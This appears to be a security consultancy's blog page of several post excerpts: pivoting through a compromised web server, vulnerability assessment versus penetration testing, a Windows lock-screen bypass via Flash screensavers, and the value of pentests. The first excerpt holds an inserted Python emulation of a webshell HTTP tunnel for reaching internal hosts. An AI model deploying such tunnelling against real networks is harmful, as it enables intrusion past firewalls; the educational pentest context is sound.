During a recent penetration test we ran into a situation where we had gained remote code execution with limited privileges on a web server and needed to pivot to other hosts on the internal network.
To do that, we needed a reliable way to forward traffic from our local machine to the internal host through the compromised server. This blog post describes how we solved it, for future reference.
Our scenario is best described in the diagram below:
Achieving this was not straightforward: the compromised server sat behind a firewall that permitted only ports 80 and 443 inbound, we were executing commands as the www-data user, and our non-interactive shell (PHP passthru) was quite limited.
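One common way to work within that set of constraints (inbound 80/443 only, a non-interactive webshell, no privileges) is a webshell-based HTTP tunnel: a small script on the compromised server turns each HTTP request into a TCP operation against the internal host, and a client on the attacker's machine wraps its traffic in those requests. The Python below is an added illustration of that pattern and not the method from this post (the post's own solution is not reproduced here); `WebshellTunnel`, `pivot_exchange`, the `cmd`/`sid`/`data` request parameters and the local echo server standing in for the internal host are all constructed for the example, and both ends run in one process so it works offline.

```python
"""Webshell HTTP-tunnel pivot pattern, emulated end to end (added example)."""
import base64
import select
import socket
import threading
import uuid


class WebshellTunnel:
    """Stands in for the script dropped on the compromised web server.

    Each call to handle() corresponds to one HTTP request from the attacker's
    machine. The open sockets it keeps (keyed by session id) are the state a
    real server-side script has to preserve between stateless HTTP requests.
    """

    def __init__(self):
        self.sessions = {}

    def handle(self, params):
        cmd = params.get("cmd")
        if cmd == "connect":
            # Open the TCP connection to the internal host on the server's behalf.
            sock = socket.create_connection((params["host"], int(params["port"])), timeout=2)
            sid = uuid.uuid4().hex
            self.sessions[sid] = sock
            return {"status": "ok", "sid": sid}
        if cmd == "forward":
            sock = self.sessions[params["sid"]]
            outbound = base64.b64decode(params.get("data", ""))
            if outbound:
                sock.sendall(outbound)
            # Collect whatever the internal host answered within a short window.
            chunks = []
            while True:
                readable, _, _ = select.select([sock], [], [], 0.2)
                if not readable:
                    break
                chunk = sock.recv(4096)
                if not chunk:  # peer closed the connection
                    break
                chunks.append(chunk)
            return {"status": "ok", "data": base64.b64encode(b"".join(chunks)).decode()}
        if cmd == "disconnect":
            sock = self.sessions.pop(params["sid"], None)
            if sock is not None:
                sock.close()
            return {"status": "ok"}
        return {"status": "error", "msg": "unknown cmd"}


def pivot_exchange(tunnel, host, port, payload):
    """Attacker-side logic: open a session, push payload, return the reply."""
    sid = tunnel.handle({"cmd": "connect", "host": host, "port": port})["sid"]
    try:
        reply = tunnel.handle({"cmd": "forward", "sid": sid,
                               "data": base64.b64encode(payload).decode()})
        return base64.b64decode(reply["data"])
    finally:
        tunnel.handle({"cmd": "disconnect", "sid": sid})


def start_echo_server():
    """Constructed stand-in for the internal host: replies with the upper-cased input.

    Returns the (host, port) it listens on; serves a single connection.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    host, port = start_echo_server()
    print(pivot_exchange(WebshellTunnel(), host, port, b"ping from attacker"))
```

In a real engagement the server-side half would be a PHP (or other) script hosted next to the foothold and reached only over 80/443, and the client would expose a local SOCKS or port-forward listener rather than a single `pivot_exchange` call. The part this emulation glosses over, keeping a TCP socket alive across stateless HTTP requests, is exactly what established webshell-tunnelling tools such as reGeorg handle, and it is why such tunnels are slow and chatty compared with a direct reverse connection.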
In this post we will take a quick look at the differences between vulnerability assessment (VA) and penetration testing (PT). Furthermore, we’ll give a set of questions that should help you decide which service is the best choice for your particular case.
So let’s say you want to improve the security of your internal network infrastructure and you have to choose between VA and PT – offered by your favorite consultancy firm. First of all, let’s see what they are.
Vulnerability Assessment – is the process of identifying and prioritizing technical vulnerabilities that affect a target system or network. It is mostly automated, using a vulnerability scanner, and is usually aimed at a large number of machines. The purpose of a VA is to find as many vulnerabilities as possible in the given time frame. Optionally, manual validation may be included for the critical findings, but this is not usually done when a high number of vulnerabilities is involved.
Penetration Testing – is a goal-based simulation of a real attack. The pentesters search for a chain of vulnerabilities in the target system/network and exploit them to reach their objective (e.g. gain access to a client database, obtain sensitive information, gain Domain Admin, etc.). The pentest report contains only the vulnerabilities encountered on the way to the objective; no additional checks are made. The reported vulnerabilities are, however, fully validated and their risk to the business is assessed accurately.
Neither a VA nor a PT should be confused with a security audit, which is a different service altogether.
We have recently discovered an easy method to bypass the Windows Lock screen when a flash screensaver is running.
The method allows an attacker with physical access to a locked machine to gain unauthorized access to the user’s Windows session.
When users leave their computer (e.g. during a lunch break), they should lock their session to prevent other people from performing actions on their behalf.
Some computers, mostly in corporate environments, are configured to play a Flash animation as the screensaver while the computer is locked. This is done by specifying the path to a .scr file, which is actually a renamed executable obtained by compiling a .swf. The following registry key specifies the path to this executable:
Penetration testing projects are definitely fun for passionate pentesters.
However, the question is what are the real benefits of a pentest for the client company?
What is the real value of a penetration test?
Many clients have misconceptions and false assumptions about penetration testing and engage in this type of project for the wrong reasons, such as:
- After a penetration test I will be safe
- A penetration test will find all of my vulnerabilities
- I’ve heard that pentesting is ‘sexy’ so I would like one myself
Companies that commission penetration tests for these reasons do not get the real benefits of the service and are practically throwing their money away.
From my perspective, a penetration test has the following true benefits for the client company: